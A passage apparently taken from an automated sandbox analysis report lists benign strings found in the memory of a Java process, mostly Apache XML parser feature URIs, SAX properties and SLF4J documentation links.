                    Source: javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/dom/defer-node-expansionG
                    Source: javaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/dom/include-ignorable-whitespace
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/generate-synthetic-annotations
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/honour-all-schemaLocations
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/include-comments
                    Source: javaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/include-comments1
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/internal/parser-settings
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/internal/tolerate-duplicates
                    Source: javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/internal/tolerate-duplicatesO
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/internal/validation/schema/use-grammar-pool-only
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/namespace-growth
                    Source: javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/namespace-growth;
                    Source: javaw.exe, javaw.exe, 00000003.00000003.2228038429.00000000159BB000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3001038964.00000000159BE000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335885806.00000000159BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/namespacesq
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/nonvalidating/load-external-dtd
                    Source: javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/nonvalidating/load-external-dtdA
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/scanner/notify-builtin-refs
                    Source: javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/scanner/notify-builtin-refs7
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/scanner/notify-char-refs
                    Source: javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/scanner/notify-char-refs:
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/standard-uri-conformant
                    Source: javaw.exe, 00000003.00000003.2231217783.0000000015AE2000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3001038964.0000000015AD9000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2228038429.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335885806.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3003103430.0000000015AD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/standard-uri-conformantno
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/validate-annotations
                    Source: javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/validate-annotationsl
                    Source: javaw.exe, 00000003.00000003.3003103430.0000000015AD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/validation/balance-syntax-trees
                    Source: javaw.exe, 00000003.00000003.2231217783.0000000015AE2000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3001038964.0000000015AD9000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2232527015.0000000015AEB000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2228038429.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335885806.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3003103430.0000000015AD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/validation/dynamic
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/validation/schema
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/validation/schema-full-checking
                    Source: javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/validation/schema-full-checking5
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/validation/schema/augment-psvi
                    Source: javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/validation/schema/augment-psvi=
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/validation/schema/element-default
                    Source: javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/validation/schema/element-default=
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/validation/schema/normalized-value
                    Source: javaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/validation/schema:
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/validation/warn-on-duplicate-attdef
                    Source: javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/validation/warn-on-duplicate-attdef#l
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/validation/warn-on-undeclared-elemdef
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/warn-on-duplicate-entitydef
                    Source: javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/warn-on-duplicate-entitydefD
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/xinclude
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/xinclude/fixup-base-uris
                    Source: javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/xinclude/fixup-base-uris6
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/xinclude/fixup-language
                    Source: javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/xinclude/fixup-language:
                    Source: javaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/xincludeC
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/dom/current-element-node
                    Source: javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/dom/current-element-node7
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/dom/document-class-name
                    Source: javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/dom/document-class-name3
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/input-buffer-size
                    Source: javaw.exe, 00000003.00000003.2231217783.0000000015AE2000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3001038964.0000000015AD9000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2228038429.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335885806.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3003103430.0000000015AD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/input-buffer-sizeache.o
                    Source: javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/datatype-validator-factory
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/document-scanner
                    Source: javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/document-scanner5
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/dtd-processor
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/dtd-scanner
                    Source: javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/dtd-scanner;
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/entity-manager
                    Source: javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/entity-manager:
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/entity-resolver
                    Source: javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/entity-resolver?
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/error-handler
                    Source: javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/error-handler=
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/error-reporter
                    Source: javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/error-reporter8
                    Source: javaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/grammar-pool
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/namespace-binder
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/namespace-context
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/stax-entity-resolver
                    Source: javaw.exe, javaw.exe, 00000003.00000003.2231217783.0000000015AE2000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3001038964.0000000015AD9000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2228038429.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335885806.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3003103430.0000000015AD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/stax-entity-resolver1C5
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/symbol-table
                    Source: javaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/symbol-table6
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/validation-manager
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/validation/schema/dv-factory
                    Source: javaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxOccurLimitQ
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxParameterEntitySizeLimit
                    Source: javaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxParameterEntitySizeLimit#
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxXMLNameLimit
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/totalEntitySizeLimit
                    Source: javaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/totalEntitySizeLimitM
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/xmlSecurityPropertyManager
                    Source: javaw.exe, 00000003.00000002.4543801058.0000000015C4B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335705359.0000000016B17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.slf4j.org/codes.html
                    Source: javaw.exe, 00000003.00000002.4545973178.0000000016CA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.slf4j.org/codes.html#StaticLoggerBinder
                    Source: javaw.exe, 00000003.00000003.2335794856.0000000016CA1000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4545973178.0000000016CA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.slf4j.org/codes.html#StaticLoggerBinder&C
                    Source: javaw.exe, 00000003.00000002.4545973178.0000000016CA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.slf4j.org/codes.html#loggerNameMismatch
                    Source: javaw.exe, 00000003.00000003.2335794856.0000000016CA1000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4545973178.0000000016CA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.slf4j.org/codes.html#loggerNameMismatch&o
                    Source: javaw.exe, 00000003.00000002.4545973178.0000000016CA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.slf4j.org/codes.html#multiple_bindings
                    Source: javaw.exe, 00000003.00000002.4543801058.0000000015C4B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335794856.0000000016CA1000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4545973178.0000000016CA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.slf4j.org/codes.html#null_LF
                    Source: javaw.exe, 00000003.00000002.4543801058.0000000015C4B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335794856.0000000016CA1000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4545973178.0000000016CA1000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4545639440.0000000016A16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.slf4j.org/codes.html#replay
                    Source: javaw.exe, 00000003.00000002.4543801058.0000000015C4B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4545639440.0000000016A16000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335705359.0000000016B17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.slf4j.org/codes.html#substituteLogger
                    Source: javaw.exe, 00000003.00000002.4545639440.0000000016A16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.slf4j.org/codes.html#unsuccessfulInit
                    Source: javaw.exe, 00000003.00000002.4543801058.0000000015C4B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335794856.0000000016CA1000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4545973178.0000000016CA1000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4545639440.0000000016A16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.slf4j.org/codes.html#version_mismatch
                    Source: javaw.exe, 00000003.00000003.2335705359.0000000016B17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.slf4j.org/codes.htmla3
                    Source: javaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://xml.apache.org/xalan
                    Source: javaw.exe, javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2228038429.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3001038964.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335885806.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.0000000015A77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://xml.apache.org/xpath/features/whitespace-pre-stripping
                    Source: javaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2231217783.0000000015BEE000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335885806.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3003103430.0000000015AD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://xml.apache.org/xslt
                    Source: javaw.exe, 00000003.00000003.2231217783.0000000015AE2000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3001038964.0000000015AD9000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2232527015.0000000015AEB000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2228038429.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335885806.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3003103430.0000000015AD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/features/
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/features/allow-dtd-events-after-endDTD
                    Source: javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/features/allow-dtd-events-after-endDTD7
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/features/external-general-entities
                    Source: javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/features/external-general-entities7
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/features/external-parameter-entities
                    Source: javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/features/external-parameter-entities8
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/features/namespace-prefixes
                    Source: javaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/features/namespace-prefixes1
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/features/namespaces
                    Source: javaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/features/namespaces?
                    Source: javaw.exe, javaw.exe, 00000003.00000003.2228038429.00000000159BB000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4539258471.000000000AA94000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3001038964.00000000159BE000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335885806.00000000159BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/features/string-interning
                    Source: javaw.exe, 00000003.00000003.2335885806.00000000159BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/features/string-interningfeature
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/features/use-entity-resolver2
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/features/validation
                    Source: javaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/features/validation?
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/properties/
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/properties/lexical-handler
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/properties/xml-string
                    Source: javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/properties/xml-string?
